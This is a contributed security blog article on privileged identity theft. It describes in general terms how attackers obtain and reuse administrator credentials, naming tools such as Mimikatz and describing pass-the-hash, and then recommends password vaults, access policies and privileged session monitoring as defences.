Understanding the threat of privilege identity theft
Understanding the threat of privilege identity theft

Privileged users can have a huge range of roles; IT staff, board directors, financial planners, security, network engineers, database admins or even something as seemingly innocuous as HR personnel. Whilst they all have vastly different responsibilities they share similar high levels of trust from the company. This level of access and trust is exactly what makes these users a potential threat to your company.

If the credentials of the accounts these privileged users have access to are compromised, the results could be devastating. Seven of the ten largest data breaches since 2000 have explicitly mentioned privileged identity theft in the post-mortem review. In these breaches, well resourced, external actors, some with the backing of nation states, were able to collect and extract massive amounts of using privileged users accounts.

What's more worrying is that by using the identity of a privileged user who has access to critical infrastructure it's possible to shut down critical national assets, like the national power grid attack that occurred in Ukraine in 2015 and 2016.

How does an attacker compromise privileged credentials?

Hackers have learnt that there are potentially infinite access points for them into a system. The IT security community has come to the realisation that a perimeter is not enough to keep hackers out.  Public facing apps, BYOD and hybrid IT networks all provide opportunities for entry.

It might seem more obvious that hackers will attempt social engineering exploits on your privileged users. However, in reality, it is far more likely that they will aim for a softer initial target. A regular employee is likely to be less tech savvy than an administrator making them a far easier target. Once within the network, hackers will move onto their true target, the privileged user. The amount of publicly available information to attackers is vast. Social networks like Facebook, LinkedIn, Instagram and Twitter all provide rich sources of information for criminals to use when manipulating users.

With access secured, attackers look to gain a foothold by tricking an unsuspecting user into performing an action to further their aims. Normally an attacker will convince the victim open a document or click a link, which will download and install malware. This can all be done through email, instant message or a social network. The malware tools used in these targeted attacks aim to help attackers take over the victim's device, or gather credentials. Keyloggers can record every keystroke making them ideal for this purpose.  Other tools like Mimikatz and WCE can collect credential information stored locally. All of these tools are effective and easily accessible on the internet.

With a foothold inside the IT environment an attacker will perform reconnaissance, sometimes for months at a time. They'll gather as much information as possible about the IT infrastructure, mapping out the network and systems.

With detailed knowledge of a network attackers will go about acquiring higher privileges. There are several common methods for doings this. Passwords have been the bedrock of IT security for decades. When passwords are stored they can be encrypted using a one-way transformation called hash. Normally, an attacker that steals encrypted passwords needs to decrypt them to gain access to systems but this is time-consuming and difficult. On Windows machines, password hashes are cached in the Local Security Authority Subsystem (Lsass). If an attacker is able to access these hashes, particularly ones for administrator accounts, they download these hashes to gain access to other machines and systems. The attacker can authenticate on a remote server or service by using the underlying NTLM or LanMan hash of a user's password, instead of the plaintext password.

Putting in place protection

Having the correct security practices in place is the key to protecting your organisation against these kinds of attacks. Formulating a list of all privileged accounts and their scope, before putting in place strict rules will dramatically limit the number of users with access to critical systems. A formal password policy is also essential for protecting systems. This might include changing default passwords as a matter of course, implementing strong passwords and forbidding the sharing of credentials. These might sound like simple steps, but in reality, they are where surprisingly large numbers of organisations fall short.

The difficulty in securing an organisation grows with the organisation itself. Even in a medium sized business managing privileged access can become unworkable without the correct processes and tools in place.

A good place to start is with password management software, design specifically for privileged accounts. This kind of software can control access to accounts, generate strong passwords, randomise passwords and store them all in a vault. With these abilities it's possible to secure passwords centrally and enforce strong passwords, making a hacker's life much tougher. Some systems can even offer time-limited passwords meaning they can be used for third parties or temporary workers securely.

However, even with these management systems in place, like all passwords if the credentials are compromised there's little to no protection.

The alternative then is to implement privileged session management tools. These provide centralised points for management to restrict user activity down to a level based on the user's role. Most importantly these systems offer real-time monitoring. This enables security teams to supervise the activity of privileged users, monitoring for unusual behaviour or potentially damaging commands. Whatsmore with this monitoring enables audit trails to be created, making it possible to determine who did what on critical IT assets.

Privileged users will continue to be a concern for IT managers, any user with access beyond the norm will always be a threat. However, with the correct tools in place and a strict set of protocols for access it is possible to significantly lessen the risks.

Contributed by Csaba Krasznay, security evangelist at Balabit.

*Note: The views expressed in this blog are those of the author and do not necessarily reflect the views of SC Media UK or Haymarket Media.